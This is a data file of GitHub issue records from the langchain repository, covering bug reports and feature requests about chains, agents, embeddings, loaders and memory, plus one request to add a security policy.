issue_owner_repo
listlengths
2
2
issue_body
stringlengths
0
261k
issue_title
stringlengths
1
925
issue_comments_url
stringlengths
56
81
issue_comments_count
int64
0
2.5k
issue_created_at
stringlengths
20
20
issue_updated_at
stringlengths
20
20
issue_html_url
stringlengths
37
62
issue_github_id
int64
387k
2.46B
issue_number
int64
1
127k
[ "langchain-ai", "langchain" ]
Knowing that Pandas and spark cannot be compared to the speed of Polars, please can you create a Polars Dataframe Agent? It is 15x faster than Pandas.
Polars Dataframe Agent Needed
https://api.github.com/repos/langchain-ai/langchain/issues/4620/comments
3
2023-05-13T08:46:09Z
2024-03-08T12:38:36Z
https://github.com/langchain-ai/langchain/issues/4620
1,708,521,121
4,620
[ "langchain-ai", "langchain" ]
### System Info langchain==0.0.167 python=3.10.10 system: Windows ### Who can help? @hwchase17 @agola11 ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [X] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction `# !pip install langchain==0.0.167 from langchain import OpenAI, SQLDatabase, SQLDatabaseChain db = SQLDatabase.from_uri("mysql+pymysql://user:pass@some_mysql_db_address/db_name") llm = OpenAI(temperature=0, verbose=True) db_chain = SQLDatabaseChain.from_llm(llm, db, verbose=True) db_chain.run("How many employees are there?") ` ### Expected behavior Should not throw AttributeError: type object 'SQLDatabaseChain' has no attribute 'from_llm'
SQLDatabaseChain has no attribute from_llm
https://api.github.com/repos/langchain-ai/langchain/issues/4618/comments
6
2023-05-13T07:40:59Z
2024-03-26T09:21:00Z
https://github.com/langchain-ai/langchain/issues/4618
1,708,504,243
4,618
[ "langchain-ai", "langchain" ]
### Feature request It would be great if LangChain could support more HuggingFace embedding models. Prompt techniques don't work very well with currently available sentence transformer models. Open-source-powered technology could benefit from the adoption of updated models like Cerebras-GPT and Dolly. ### Motivation While creating a QA model with HuggingFace embedding and models, I find out that its performance could be with new models like Cerebras-GPT and Dolly. ### Your contribution Yes, if someone guides me.
Support for new Hugging Face models like Cerebras-GPT, Dolly and others.
https://api.github.com/repos/langchain-ai/langchain/issues/4617/comments
3
2023-05-13T06:48:25Z
2023-09-15T16:13:37Z
https://github.com/langchain-ai/langchain/issues/4617
1,708,471,497
4,617
[ "langchain-ai", "langchain" ]
Hello 👋 I run a security community that finds and fixes vulnerabilities in OSS. A researcher (@r3pwnx) has found a potential issue, which I would be eager to share with you. Could you add a `SECURITY.md` file with an e-mail address for me to send further details to? GitHub [recommends](https://docs.github.com/en/code-security/getting-started/adding-a-security-policy-to-your-repository) a security policy to ensure issues are responsibly disclosed, and it would help direct researchers in the future. Looking forward to hearing from you 👍 (cc @huntr-helper)
Add a security policy
https://api.github.com/repos/langchain-ai/langchain/issues/4614/comments
1
2023-05-13T04:20:13Z
2023-09-10T16:18:36Z
https://github.com/langchain-ai/langchain/issues/4614
1,708,426,607
4,614
[ "langchain-ai", "langchain" ]
### System Info def _split_list_of_docs( docs: List[Document], length_func: Callable, token_max: int, **kwargs: Any ) -> List[List[Document]]: new_result_doc_list = [] _sub_result_docs = [] for doc in docs: _sub_result_docs.append(doc) _num_tokens = length_func(_sub_result_docs, **kwargs) if _num_tokens > token_max: if len(_sub_result_docs) == 1: raise ValueError( "A single document was longer than the context length," " we cannot handle this." ) if len(_sub_result_docs) == 2: raise ValueError( "A single document was so long it could not be combined " "with another document, we cannot handle this." ) new_result_doc_list.append(_sub_result_docs[:-1]) _sub_result_docs = _sub_result_docs[-1:] new_result_doc_list.append(_sub_result_docs) return new_result_doc_list I encountered an issue with the following error message: "A single document was so long it could not be combined with another document, we cannot handle this." I suspect this could be a bug. The error might occur when the combined length of the summaries of two docs exceed the token_max limit. In this case, I believe that the two docs should be summarized separately and then merged. Could you provide a callback function allowing users to handle the logic of the _split_list_of_docs function by themselves? ### Who can help? _No response_ ### Information - [ ] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [x] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction https://github.com/hwchase17/langchain/blob/01531cb16d09b9290fc091434b0c69cb91a8f500/langchain/chains/combine_documents/map_reduce.py#L22 ### Expected behavior I believe that the two docs should be summarized separately and then merged. Could you provide a callback function allowing users to handle the logic of the _split_list_of_docs function by themselves?
map_reduce._split_list_of_docs has bugs
https://api.github.com/repos/langchain-ai/langchain/issues/4613/comments
7
2023-05-13T04:04:27Z
2023-10-12T16:09:49Z
https://github.com/langchain-ai/langchain/issues/4613
1,708,422,949
4,613
[ "langchain-ai", "langchain" ]
How do i add memory to RetrievalQA.from_chain_type? or, how do I add a custom prompt to ConversationalRetrievalChain? For the past 2 weeks ive been trying to make a chatbot that can chat over documents (so not in just a semantic search/qa so with memory) but also with a custom prompt. I've tried every combination of all the chains and so far the closest I've gotten is ConversationalRetrievalChain, but without custom prompts, and RetrievalQA.from_chain_type but without memory
How do i add memory to RetrievalQA.from_chain_type? or, how do I add a custom prompt to ConversationalRetrievalChain?
https://api.github.com/repos/langchain-ai/langchain/issues/4608/comments
21
2023-05-13T02:41:24Z
2024-06-07T00:21:07Z
https://github.com/langchain-ai/langchain/issues/4608
1,708,402,102
4,608
[ "langchain-ai", "langchain" ]
https://github.com/hwchase17/langchain/blob/ed0d557ede8776921cc3c5ca1f3aef81d3d0c7b5/langchain/chat_models/google_palm.py#L65 Fix: `if author == "ai or author == "1":` seems to do the trick. Happy to submit a patch if y'all agree! The [Google Palm Chat API](https://developers.generativeai.google/tutorials/chat_quickstart#conversation_history) returns a "1" for the AI response (and a "0" for the human).
GooglePalm `author` is returned as "1" but code is expecting "ai"
https://api.github.com/repos/langchain-ai/langchain/issues/4606/comments
3
2023-05-12T23:48:59Z
2023-09-15T16:13:43Z
https://github.com/langchain-ai/langchain/issues/4606
1,708,344,927
4,606
[ "langchain-ai", "langchain" ]
### System Info Langchain ver 0.0.167, MacBook Pro 2018, Mac OS Ventura. ### Who can help? _No response_ ### Information - [ ] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction 1.) Download a model. 2.) Download the tokens file. 3.) Run code. from langchain.llms.rwkv import RWKV # Test the model def generate_prompt(instruction, input=None): if input: return f"""Below is an instruction that describes a task, paired with an input that provides further context. Write a response that appropriately completes the request. # Instruction: {instruction} # Input: {input} # Response: """ else: return f"""Below is an instruction that describes a task. Write a response that appropriately completes the request. # Instruction: {instruction} # Response: """ model = RWKV(model="~/Downloads/Q8_0RWKV.bin", strategy="cpu 8bit", tokens_path="./rwkv.tokens") response = model(generate_prompt("Once upon a time, ")) ### Expected behavior I expect the sample to produce some text. What I get is an error. It appears that the rwkv library is not installed, but it is... Traceback (most recent call last): File "/Users/John/Documents/Projects/langchainstufff/rwkv.py", line 29, in <module> model = RWKV(model="~/Downloads/Q8_0RWKV.bin", strategy="cpu 8bit", tokens_path="./rwkv.tokens") ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "pydantic/main.py", line 341, in pydantic.main.BaseModel.__init__ vectorstore: VectorStore, pydantic.error_wrappers.ValidationError: 1 validation error for RWKV __root__ -> __root__ Could not import rwkv python package. Please install it with `pip install rwkv`. (type=value_error)
RWKV
https://api.github.com/repos/langchain-ai/langchain/issues/4604/comments
4
2023-05-12T22:41:16Z
2023-10-09T16:07:52Z
https://github.com/langchain-ai/langchain/issues/4604
1,708,300,793
4,604
[ "langchain-ai", "langchain" ]
Hi , how can i remove the escape sequences that serves to coloring in langchain output. I want to pars the output and this escape are really a problem thanks
how to remove all coloring escape sequences in sqlquery and result output
https://api.github.com/repos/langchain-ai/langchain/issues/4600/comments
4
2023-05-12T20:38:36Z
2023-09-04T07:05:03Z
https://github.com/langchain-ai/langchain/issues/4600
1,708,182,875
4,600
[ "langchain-ai", "langchain" ]
### System Info ![image](https://github.com/hwchase17/langchain/assets/100080151/8ad820d3-000b-4bb7-8808-5e97dfa79c1c) ### Who can help? @vowelparrot @hwchase17 ### Information - [ ] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [X] Agents / Agent Executors - [X] Tools / Toolkits - [X] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction ![image](https://github.com/hwchase17/langchain/assets/100080151/691b9904-c874-4e6f-8d97-94090f47c9b4) ### Expected behavior ![image](https://github.com/hwchase17/langchain/assets/100080151/866a44f4-86c2-4073-b612-03fa01e2b2e8)
Even use "print", the chatgpt is still "hallucinating"??
https://api.github.com/repos/langchain-ai/langchain/issues/4599/comments
2
2023-05-12T20:31:16Z
2023-05-12T21:21:14Z
https://github.com/langchain-ai/langchain/issues/4599
1,708,173,986
4,599
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. When I try to perform a similarity_search on an opensearch index on AWS of size 50GB (approx 2 million documents with vectors for each), i sometimes get this error. It does not happen all the time. Usually the first time when I make a request the response is successful, subsequent calls immediately result in this error. Is this error, because langchain is doing a similarity search over lot of vectors and open search ran out of memory? - ``` embeddings = OpenAIEmbeddings() docsearch = OpenSearchVectorSearch(index_name="xxxxxxxx", embedding_function=embeddings, opensearch_url=opensearch_url) query = "Whats the xxxxxxx" docs = docsearch.similarity_search(query, k=1, search_type = "approximate_search", vector_field="sentence_embedding") ``` TransportError Traceback (most recent call last) Cell In[100], line 2 1 query = "Whats the warranty on labor and materials for the work performed by V.A.M.P. L.L.C." ----> 2 docs = docsearch.similarity_search(query, k=1, search_type = "approximate_search", vector_field="sentence_embedding") 3 docs File [~/training/semantic-search-elasticsearch-openai-langchain/vevn/lib/python3.9/site-packages/langchain/vectorstores/opensearch_vector_search.py:426](https://file+.vscode-resource.vscode-cdn.net/Users/AXG143/ananth/training/semantic-search-elasticsearch-openai-langchain/~/ananth/training/semantic-search-elasticsearch-openai-langchain/vevn/lib/python3.9/site-packages/langchain/vectorstores/opensearch_vector_search.py:426), in OpenSearchVectorSearch.similarity_search(self, query, k, **kwargs) 423 else: 424 raise ValueError("Invalid `search_type` provided as an argument") --> 426 response = self.client.search(index=self.index_name, body=search_query) 427 hits = [hit["_source"] for hit in response["hits"]["hits"][:k]] 428 documents = [ 429 Document( 430 page_content=hit[text_field], (...) 435 for hit in hits 436 ] File [~/training/semantic-search-elasticsearch-openai-langchain/vevn/lib/python3.9/site-packages/opensearchpy/client/utils.py:178](https://file+.vscode-resource.vscode-cdn.net/training/semantic-search-elasticsearch-openai-langchain/~/training/semantic-search-elasticsearch-openai-langchain/vevn/lib/python3.9/site-packages/opensearchpy/client/utils.py:178), in query_params.._wrapper.._wrapped(*args, **kwargs) 176 if p in kwargs: 177 params[p] = kwargs.pop(p) --> 178 return func(*args, params=params, headers=headers, **kwargs) File [~/training/semantic-search-elasticsearch-openai-langchain/vevn/lib/python3.9/site-packages/opensearchpy/client/__init__.py:1551](https://file+.vscode-resource.vscode-cdn.net/training/semantic-search-elasticsearch-openai-langchain/~/training/semantic-search-elasticsearch-openai-langchain/vevn/lib/python3.9/site-packages/opensearchpy/client/__init__.py:1551), in OpenSearch.search(self, body, index, params, headers) ... --> 301 raise HTTP_EXCEPTIONS.get(status_code, TransportError)( 302 status_code, error_message, additional_info 303 ) TransportError: TransportError(500, 'search_phase_execution_exception') ### Suggestion: Expected response - langchain Opensearch similarity_search should work consistently on multiple calls.
langchain OpenSearchVectorSearch similarity_search error
https://api.github.com/repos/langchain-ai/langchain/issues/4597/comments
3
2023-05-12T19:53:04Z
2023-11-21T16:07:20Z
https://github.com/langchain-ai/langchain/issues/4597
1,708,132,505
4,597
[ "langchain-ai", "langchain" ]
### System Info Mac OSX10.16 python 3.9 langchain 0.0.166 ### Who can help? @hwchase17 @agola11 ### Information - [X] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [X] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [X] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction I am following the example for the SelfQueryRetriever (https://python.langchain.com/en/latest/modules/indexes/retrievers/examples/self_query_retriever.html), but I am using Chroma When I try to create the SelfQueryRetriever from llm_chain SelfQueryRetriever.from_llm( vectorstore=db_chroma, llm=llm, document_contents=document_content_info, metadata_field_info=metadata_field_info ) or I try to create the chain with load_query_constructor_chain( llm=llm, document_contents=document_content_info, attribute_info=metadata_field_info, allowed_comparators=ChromaTranslator.allowed_comparators, allowed_operators=ChromaTranslator.allowed_operators) I receive the same error: def get_parser( 126 allowed_comparators: Optional[Sequence[Comparator]] = None, 127 allowed_operators: Optional[Sequence[Operator]] = None, 128 ) -> Lark: --> 129 transformer = QueryTransformer( 130 allowed_comparators=allowed_comparators, allowed_operators=allowed_operators 131 ) 132 return Lark(GRAMMAR, parser="lalr", transformer=transformer, start="program") TypeError: 'NoneType' object is not callable I tried to create a QueryTransformer as follow: QueryTransformer(allowed_comparators=ChromaTranslator.allowed_comparators, allowed_operators=ChromaTranslator.allowed_operators) Same error. ### Expected behavior I would expect to create the selfQueryRetriever to be able to retrieve the documents from the retriever.
Problem with SelfQueryRetriever
https://api.github.com/repos/langchain-ai/langchain/issues/4587/comments
5
2023-05-12T16:54:43Z
2023-05-12T17:32:26Z
https://github.com/langchain-ai/langchain/issues/4587
1,707,934,037
4,587
[ "langchain-ai", "langchain" ]
### System Info 0.0.166 ### Who can help? @agola11 ### Information - [ ] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [X] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [X] Callbacks/Tracing - [X] Async ### Reproduction from langchain.prompts import PromptTemplate from langchain.chains import LLMChain from langchain.chat_models import ChatOpenAI from langchain.callbacks import get_openai_callback ```python question = "What is the answer of the meaning of life?" prompt = PromptTemplate( input_variables=["input"], template="{input}", ) llm = ChatOpenAI(temperature=0.7, max_tokens=2000, streaming=True) chain = LLMChain(llm=llm, prompt=prompt) with get_openai_callback() as cb: print(chain.run(question)) print("\n\n") print(cb) ``` result ``` As an AI language model, I do not have a personal belief system or opinion, and therefore, I do not have an answer to this question. The meaning of life is a philosophical and subjective topic that varies from person to person. It is up to individuals to find their own purpose and meaning in life. Tokens Used: 0 Prompt Tokens: 0 Completion Tokens: 0 Successful Requests: 1 Total Cost (USD): $0.0 ``` when set streaming = False, it works. ### Expected behavior should return with token usage info with streaming = True or False
get_openai_callback dosen't work with streaming = True
https://api.github.com/repos/langchain-ai/langchain/issues/4583/comments
12
2023-05-12T15:07:29Z
2024-07-30T10:15:36Z
https://github.com/langchain-ai/langchain/issues/4583
1,707,797,834
4,583
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. PlanAndExecute agent is rising errors when no questions are asked (e.g. a greeting interaction). Is there any Chat implementation where a simple LLM chat interaction is available among the available tools? Thank you in advance. ### Suggestion: _No response_
Issue: PlanAndExecute agent fails in chat mode when a simple chat interaction is required.
https://api.github.com/repos/langchain-ai/langchain/issues/4582/comments
4
2023-05-12T14:25:16Z
2023-09-19T16:11:11Z
https://github.com/langchain-ai/langchain/issues/4582
1,707,730,929
4,582
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. I am having issues with the flow of a conversation and the chat memory. When deployed in a flask app and queried using netlify the memory is not mantained. Any suggestions? ### Suggestion: _No response_
Issue:Problems with serverless architecture and ConversationBufferMemory
https://api.github.com/repos/langchain-ai/langchain/issues/4581/comments
4
2023-05-12T13:41:33Z
2023-11-01T16:07:30Z
https://github.com/langchain-ai/langchain/issues/4581
1,707,660,358
4,581
[ "langchain-ai", "langchain" ]
### System Info Langchain version == 0.0.166 Embeddings = OpenAIEmbeddings - model: text-embedding-ada-002 version 2 LLM = AzureOpenAI ### Who can help? @hwchase17 @agola11 ### Information - [ ] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [X] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [X] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction Steps to reproduce: 1. Set up azure openai embeddings by providing key, version etc.. 2. Load a document with a loader 3. Set up a text splitter so you get more then 2 documents 4. add them to chromadb with `.add_documents(List<Document>)` This is some example code: ```py pdf = PyPDFLoader(url) documents = pdf.load() text_splitter = CharacterTextSplitter(chunk_size=1000, chunk_overlap=0) texts = text_splitter.split_documents(documents) vectordb.add_documents(texts) vectordb.persist() ``` ### Expected behavior Embeddings be added to the database, instead it returns the error `openai.error.InvalidRequestError: Too many inputs. The max number of inputs is 1. We hope to increase the number of inputs per request soon. Please contact us through an Azure support request at: https://go.microsoft.com/fwlink/?linkid=2213926 for further questions.` This is because Microsoft only allows one embedding at a time while the script tries to add the documents all at once. The following code is where the issue comes up (I think): https://github.com/hwchase17/langchain/blob/258c3198559da5844be3f78680f42b2930e5b64b/langchain/embeddings/openai.py#L205-L214 The input should be a 1 dimentional array and not multi.
AzureOpenAI InvalidRequestError: Too many inputs. The max number of inputs is 1.
https://api.github.com/repos/langchain-ai/langchain/issues/4575/comments
28
2023-05-12T12:38:50Z
2024-02-28T03:59:37Z
https://github.com/langchain-ai/langchain/issues/4575
1,707,564,739
4,575
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. CHAT_CONVERSATIONAL_REACT_DESCRIPTION agent is able to use only 1 tool per turn. The same is not happening for CONVERSATIONAL_REACT_DESCRIPTION. Is that done on purpose? How can I fix the agent to allow more than 1 tool per turn? Thank you. ### Suggestion: _No response_
Issue: CHAT_CONVERSATIONAL_REACT_DESCRIPTION only uses 1 tool per turn
https://api.github.com/repos/langchain-ai/langchain/issues/4574/comments
4
2023-05-12T12:38:32Z
2023-12-25T16:10:39Z
https://github.com/langchain-ai/langchain/issues/4574
1,707,564,297
4,574
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. Hi! I implemented a chatbot with gpt-4 and a docx file which is provided as context. If I ask questions according to this context, it is returning relevant answers, but if I want to ask a question which is out of this context, it responses 'Based on the provided context I cannot answer this question' or something like that. How can I implement it in such a way, where it uses the context for every question, but if it cant find relevant answer for it in the context provided, it should take a look in its own language model. My AgentExecutor instance looks like this: ``` def _create_chat_agent(self): self.llm = OpenAI(temperature=0, model_name="gpt-4", top_p=0.2, presence_penalty=0.4, frequency_penalty=0.2) # Data Ingestion word_loader = DirectoryLoader(DOCUMENTS_DIRECTORY, glob="*.docx") documents = [] documents.extend(word_loader.load()) # Chunk and Embeddings text_splitter = CharacterTextSplitter(chunk_size=768, chunk_overlap=200) documents = text_splitter.split_documents(documents) embeddings = OpenAIEmbeddings() vectorstore = FAISS.from_documents(documents, embeddings) # Initialise Langchain - QA chain qa = RetrievalQA.from_chain_type(llm=self.llm, chain_type="stuff", retriever=vectorstore.as_retriever()) tools = [ Tool( name="...", func=qa.run, description="..." ), ] system_msg = "You are a helpful assistant." agent = ConversationalChatAgent.from_llm_and_tools( llm=self.llm, tools=tools, system_message=system_msg ) self.chat_agent = AgentExecutor.from_agent_and_tools( agent=agent, tools=tools, verbose=True, memory=ConversationBufferMemory(memory_key="chat_history", return_messages=True) ) ``` ### Suggestion: _No response_
Issue: Not answering questions out of context using RetrievalQA Chain and ConversationalChatAgent
https://api.github.com/repos/langchain-ai/langchain/issues/4573/comments
24
2023-05-12T12:08:52Z
2024-08-08T03:46:58Z
https://github.com/langchain-ai/langchain/issues/4573
1,707,522,559
4,573
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. i have a chromadb store that contains 3 to 4 pdfs stored, and i need to search the database for documents with metadata by the filter={'source':'PDFname'}, so it doesnt return with different docs containing similar data, the same is done with using similaritysearch() without any problems, ``` chain = ConversationalRetrievalChain.from_llm(OpenAI(temperature=0), docsearch.as_retriever(), memory=memory) print(chain({'question':query})) ``` but i dont understand how to, when trying to use filters with ConversationalRetrievalchain, i have tried doing ` docsearch.as_retriever(kwargs={'filter':{'source':'pdfname'}),` but it doesnt seem to work i saw something ``` retriever = vector_store.as_retriever() retriever.search_kwargs = {'k':1} ``` but it doesnt seem to recognise the [dot]search_kwargs any help would be appreciated ### Suggestion: _No response_
can't seem to add filters in ConversationalRetrievalChain
https://api.github.com/repos/langchain-ai/langchain/issues/4572/comments
6
2023-05-12T11:52:19Z
2023-07-17T07:58:48Z
https://github.com/langchain-ai/langchain/issues/4572
1,707,488,023
4,572
[ "langchain-ai", "langchain" ]
I tried incorporating confluence document loader in my code. Its throwing some error. Can anyone help me out. Attaching the screenshots and required information. Code : ``` from langchain.document_loaders import ConfluenceLoader loader = ConfluenceLoader( url="https://vs2001.atlassian.net/wiki/spaces/<space-key>/pages/<page-id>/<doc-name>", username="<user-name>", api_key="<api-key>" ) documents = loader.load(space_key="<space-key>") print(documents) ``` Here username I use is the prefix in the email till @ symbol api_key generated in the settings of confluence. Screenshot of the error: <img width="1195" alt="Screenshot 2023-05-12 at 4 30 41 PM" src="https://github.com/hwchase17/langchain/assets/62723522/f1a83ce2-9632-418e-b272-954c7780696a"> Can anyone tell what am I doing wrong here?
Confluence Document Loader not working
https://api.github.com/repos/langchain-ai/langchain/issues/4571/comments
3
2023-05-12T11:09:50Z
2023-05-15T14:23:41Z
https://github.com/langchain-ai/langchain/issues/4571
1,707,431,483
4,571
[ "langchain-ai", "langchain" ]
### System Info Mac vs code python :Python 3.10.11 ### Who can help? _No response_ ### Information - [ ] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [X] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [X] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction 1. embedding some text into Chroma 2. query and run load_qa_chain with OpenAI ```python docs = docsearch.similarity_search(query="some txt",k=2) llm = OpenAI( streaming=True, callbacks=[StreamingStdOutCallbackHandler()], temperature=0.1) chain = load_qa_chain(llm=llm,chain_type="stuff",verbose=True) result = chain.run(input_documents=docs,question=query,return_only_outputs=True) ``` 3. The result in Chinese keeps 127 ~131 words, English will finish the whole sentence. example: ``` 我们***是一家专注于*****机构,近些年来,我们的学员人数突破****,遍布全国***个城市,海外**个国家,这自然是我们家长对于****最好的认可。我们深知宝贝一开始有兴趣,后来因为各种的枯燥变得不愿意学了,因此,我们采用三方合作配合的模式,即家长 ``` ``` 我们***是一家专注于*****机构,近些年来,我们的学员人数突破****,遍布全国***个城市,海外**个国家,这自然是我们家长对于***最好的认可。我们深知宝贝一开始有兴趣,后来因为各种的枯燥变得不愿意学了的顾虑,因此我们采用了一种科学的学习模式 ``` ### Expected behavior I think this was posted while working on characters, looking forward to a fix.
When using embedding, the Chinese reply will be incomplete
https://api.github.com/repos/langchain-ai/langchain/issues/4569/comments
4
2023-05-12T11:02:03Z
2023-05-24T07:43:59Z
https://github.com/langchain-ai/langchain/issues/4569
1,707,420,231
4,569
[ "langchain-ai", "langchain" ]
### Issue you'd like to raise. ### Describe the bug When using the db.get_usable_table_names() function with a MS SQL database, it doesn't return any table names. However, when using the same function with SQLite3, it works as expected. Interestingly, the db.run() method works correctly, returning expected records for direct SQL queries like 'select * from Shops'. ### To Reproduce `db = SQLDatabase.from_uri("mssql+pymssql://user:pass@xxx.xxx.xxx.xxx:port/KK_ANA")` - Call db.get_table_names(). The return value is an empty set. [return "set()"] - Run a direct SQL query using db.run('select * from Shops'). It correctly returns the expected records. Run the SQLDatabaseSequentialChain: `llm = ChatOpenAI(temperature=0) db_chain = SQLDatabaseSequentialChain.from_llm(llm, db, verbose=True) db_chain.run('show me list of tables')` ### Output ![return1](https://github.com/hwchase17/langchain/assets/57922467/ac4ad37b-2d94-4e03-9784-4ce7a1d014ab) ### Environment - Langchain version: 0.0.165 - Python version: 3.10 - SQLAlchemy Version: 2.0.12 (problem also occurs with version 1.4.x) - pymssql Version: 2.2.7 ### Suggestion: _No response_
Issue: db.get_usable_table_names() return nothing
https://api.github.com/repos/langchain-ai/langchain/issues/4565/comments
5
2023-05-12T09:28:35Z
2024-03-11T13:35:37Z
https://github.com/langchain-ai/langchain/issues/4565
1,707,286,145
4,565
[ "langchain-ai", "langchain" ]
### System Info langchain = "^0.0.154" Platform - macos Python Version - python 3.10.4 ### Who can help? @eyurtsev There is no directory called .credentials in my home directory thats why getting this error. Is this intional? why not create this directory before opening token_path to write the token json. Code reference = https://github.com/hwchase17/langchain/blob/master/langchain/document_loaders/youtube.py#L94 ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [X] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction Was trying to use official Youtube loader by following [this](https://python.langchain.com/en/latest/modules/indexes/document_loaders/examples/youtube_transcript.html#youtube-loader-from-google-cloud) tutorial. ### Expected behavior It should not throw this error
FileNotFoundError: [Errno 2] No such file or directory: '$HOME/.credentials/token.json'
https://api.github.com/repos/langchain-ai/langchain/issues/4564/comments
1
2023-05-12T08:55:44Z
2023-09-10T16:18:46Z
https://github.com/langchain-ai/langchain/issues/4564
1,707,232,005
4,564
[ "langchain-ai", "langchain" ]
### System Info Hi i am using ConversationalRetrievalChain with agent and agent.run function is not returning source documents. Is this by functionality or is it a missing feature? ``` def llm_answer(query): chat_history = [] result = qa({"question": query, "chat_history": chat_history}) print('result is') print(result) print('-----------------------------') print(result['source_documents'][0]) print('-----------------------------') #populateHistory(query, result) return result qa = ConversationalRetrievalChain.from_llm(OpenAI(temperature=0), db.as_retriever(), return_source_documents=True) class requestModel(BaseModel): question: str app = FastAPI() tools = [ Tool.from_function( func=llm_answer, name = "Email knowledge base", description="useful for when you need to answer questions from emails in knowledge base", args_schema=requestModel ) #more tools ] agent = initialize_agent(tools, llm, agent=AgentType.ZERO_SHOT_REACT_DESCRIPTION, verbose=True) # Define API endpoint for querying the model @app.post('/answer') async def answer(request: requestModel): print('request received') source_documents = [] # Get data from request print("Query is " + request.question) q_answer2 = agent.run(request.question) print("answer is ") print(q_answer2) #construct a json object to return answer and sources to the client reply = {'answer' : str(q_answer2), 'sources' : []} # for x in q_answer2["source_documents"]: # reply['sources'].append(x.metadata["source"]) return reply ``` ### Who can help? @hwchase17 ### Information - [ ] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [X] Agents / Agent Executors - [ ] Tools / Toolkits - [X] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction use code sample provided ### Expected behavior agent.run should provide with both answers and source_documents
ConversationalRetrievalChain with Custom Agent is not returning source documents
https://api.github.com/repos/langchain-ai/langchain/issues/4562/comments
10
2023-05-12T08:18:15Z
2024-03-04T14:51:38Z
https://github.com/langchain-ai/langchain/issues/4562
1,707,179,648
4,562
[ "langchain-ai", "langchain" ]
### Feature request TLDR: Working on using `chat-conversational-react-description` agent and `RetrievalQA` as tool to answer queries using vectorDB. Issue: If question is asked in japanese (Vectordb is in japanese as well), the agent's initial `action_input` is complete nonsensical (agent automatically translated it to english) which results in wrong final answer. Request: (1) It would be helpful to somehow manipulate the `action_input` for agents to not rephrase the input queries when using vector db or prompt support of agents with different languages. (2) It would be more helpful to have someway to see what knowledge the agent is using. Currently, I need to rely on only passing user query to `RetrievalQA_chain` with `return_source_documents=True` to check. Code for reference: ```python retriever = RetrievalQA.from_chain_type( llm=LLM, chain_type="stuff", retriever=db_retriever, return_source_documents=False, ) retriever_tool_description = """Use this tool when you need to answer specific or game related questions. This tool can also be used for follow up questions from the user. """ tools = [ Tool( func=retriever.run, description=retriever_tool_description, name="Game Data DB" ), ] memory = ConversationBufferWindowMemory( memory_key="chat_history", input_key="input", output_key="output", k=3, return_messages=True, ) conversational_agent = initialize_agent( agent="chat-conversational-react-description", tools=tools, llm=LLM, verbose=True, max_iterations=2, early_stopping_method="generate", memory=memory, return_intermediate_steps=True, ) sys_msg = """Your role is to answer the game user's questions in a human-like manner""" prompt = 